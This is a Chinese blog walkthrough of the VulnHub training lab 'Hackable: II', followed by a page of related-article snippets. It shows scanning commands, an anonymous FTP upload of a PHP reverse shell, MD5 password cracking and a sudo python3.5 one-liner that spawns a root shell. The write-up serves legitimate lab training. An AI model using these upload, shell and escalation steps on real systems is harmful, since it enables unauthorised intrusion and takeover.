VulnHub靶场渗透实战-hackable-ii

最新推荐文章于 2024-05-26 19:36:18 发布
最新推荐文章于 2024-05-26 19:36:18 发布
阅读量507 收藏 1
点赞数 2
分类专栏: VulnHub靶场 文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60329350/article/details/127745413
版权

靶场地址:Hackable: II ~ VulnHub

 靶场难度:easy

适用场景:Virtualbox   

网络模式:桥接模式

一:信息探测

1.主机发现

 换种主机发现的方法。

netdiscover -r 192.168.1.1/24

 2,开放服务及端口。分别访问一下。

 2,ftp服务-anonymous登录。

 3,看一下目录,准备好接听电话!

gobuster dir -u http://192.168.1.26:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

 发现和 ftp 中的一样,应该是 ftp 服务器提供的,可以尝试一下在 FTP 服务器中放置一个 webshell,然后用 Web 浏览器执行它。

 二:漏洞利用

1:利用ftp上传shell,

拷贝 kali 中的 php-reverse-shell.php当前目录,修改为反弹shell监听的IP。

 2:上传成功

put php-reverse-shell.php

 3:反弹成功

 4:提权

1;切换到shell,可以优化一下的意思。

python3 -c 'import pty;pty.spawn("/bin/bash")'

1;首先,查看密码本,发现shrek这个用户,或者直接进到home,运行一下。

2:shrek 用户的密码,md5解密。

 

 3:连接到ssh。

 三:提权

这个用户只能用sudo使用python3.5这条命令 使用python os库调用系统命令

sudo python3.5 -c 'import os;os.system("/bin/bash")'

 ssh提权成功,两个flag。

 

 2:监听提权成功,两个flag。

 perfect !!!

学安全的杨咩咩
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Simple-Yet-Hackable-WhatsApp-api:没有官方的WhatsApp API。 这是一个满足需求的简单python类
04-29
简单但可破解的WhatsApp-api安装要在您的项目中使用此api,您可以从此存储库下载whatsapp.py和emoji.json ,并将其保存在项目的同一文件夹/子文件夹中。 为您的项目创建一个新的.py文件,并使用from whatsapp import...
vulnhub靶场-SOCIAL NETWORK
qq_42947816的博客
05-10 485
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
VulnHub靶场-Tiki
hxync的博客
08-08 909
靶场下载地址:tiki. 下载之后导入virtualbox启动 不能直接看到IP地址 先看一下kali的ip: Nmap扫一下192.168.1.0/24网段的主机,找到了靶机的IP地址 再扫一下靶机开放的端口: 开放了22 80 139 445 这四个端口 浏览器访问80端口没有发现什么有用的东西 Dirbuster扫一下目录 浏览器访问一下扫到的robots.txt 发现robots.txt文件里也有扫到的tiki目录,访问一下 发现提示是tikiwikicms 再加上下载靶场时有提示是cve漏洞
vulnhub靶场渗透实战(8-y0usef)
随心所欲不逾矩
08-30 428
靶场难度:简单环境:Virtualbox搭建结果:拿到两个权限的flag。Virtualbox:192.168.3.2(桥接模式)kali:192.168.3.9(桥接模式)
vulnhub靶场-BoredHackerBlog: Cloud AV
qq_42947816的博客
05-10 865
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶场渗透实战14-Looz
随心所欲不逾矩
12-20 324
直接老规矩,vbox导入。网络模式桥接。靶机下载地址。
Eaglejs一个用Vuejs构建的可hackable幻灯片框架
08-08
Eagle.js - 一个用Vue.js构建的可hackable幻灯片框架
snpe-detector-demo-app
05-02
AI Hackable Object Detector-HackMobile 2018演示 SNPE上带有MobileNet-SSD的演示APP。 兼容于 (GPU加速)QRD 8998,QRD 710,Galaxy S8 / S8 +,Galaxy S9 (仅限CPU)Pixel,Pixel 2,HTC One M8 可以在任何...
blogophon:静态站点生成器,支持Markdown,响应图像,RSS和其他RESTable文件。 使用Node.js和最小的依赖关系构建
05-06
Blogophon 一个支持 ,, 。 使用Node.js和最小的依赖关系构建。 该博客生成器的一个实时示例可以在找到 。 特征 ... 它通过Mustache使用简单,快速且易于。 它还支持多个主题。... 生成一堆查找文章的方法:常规索引...
Android代码-huginn
08-06
Think of it as a hackable version of IFTTT or Zapier on your own server. You always know who has your data. You do. Here are some of the things that you can do with Huginn: Track the weather and ...
VulnHub靶场渗透实战-hackable3
随心所欲不逾矩
11-11 834
靶场环境:Virtualbox(最后总结出来:用新版本导入)网络模式:桥接。靶场难度:中等。结果思路总结:本节使用的工具和漏洞难度中等,涉及到CTF中的隐写术,Brainfuck解密。
CTF网络安全大赛简单web题目:eval
Pythonit教程网
05-17 968
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
常见web安全漏洞
qq_52712762的博客
05-24 1111
管理员备份网站文件后错误的将备份放在Web目录下,有:.rar、.zip、.7z、.tar、.tar.gz、.bak、.txt。使用” ../”测试,/var/www/images/../../../etc/passwd等价于/etc/passwd。③Web网站的程序编写存在问题,对用户提交请求没有进行适当的过滤,直接使用用户提交上来的。Web中间件,介于操作系统和应用程序之间的产品,面向信息系统交互,集成过程中的通用部分的。然后,将仔细研究网站的响应,以尝试找出有趣的。
web安全渗透测试工具篇(二):sqlmap常用命令和nmap常用命令
最新发布
HACKONE的博客
05-26 98
这些选项可以用来创建用户自定义函数。--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
web安全渗透测试十大常规项(二):web渗透测试之XSS跨站脚本攻击
HACKONE的博客
05-26 42
渗透测试之XSS跨站脚本攻击XSS跨站脚本攻击 XSS跨站脚本攻击
CTF网络安全大赛简单的web抓包题目:HEADache
Pythonit教程网
05-20 466
题目 描  述: > Wanna learn about some types of headache?红客网:blog.hongkewang.cn。”,就能获取到flag,完成题目了。直接在抓包到的页面添加请求头“题目来源于:bugku。
web安全渗透测试十大常规项(一):web渗透测试之CSRF跨站请求伪造
HACKONE的博客
05-26 45
渗透测试之CSRF跨站请求伪造CSRF跨站请求伪造 CSRF跨站请求伪造
社交网络安全:保护用户数据的Facebook实践
2301_78954254的博客
05-23 458
作为全球最大的社交平台之一,Facebook一直致力于保护用户数据的安全和隐私。通过采用先进的数据加密技术、严格的权限控制机制、健全的用户信息保护政策、及时修复安全漏洞、开展用户教育和安全意识提升等措施,Facebook不断加强社交网络安全,确保用户在平台上的安全使用和交流。然而,社交网络安全是一个持续不断的过程,需要社交平台、用户以及整个社会的共同努力,共同维护社交网络的安全和健康发展。
网络安全(黑客)—-2024自学手册
xv7676的博客
05-18 1282
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
../../hackable/uploads/webshell.PHP
07-28
回答: "../../hackable/uploads/webshell.PHP"是一个文件路径,它指向一个名为webshell.PHP的文件,该文件位于hackable目录的两级上级目录中的uploads文件夹中。这个文件路径可能是由于文件上传漏洞导致的,攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值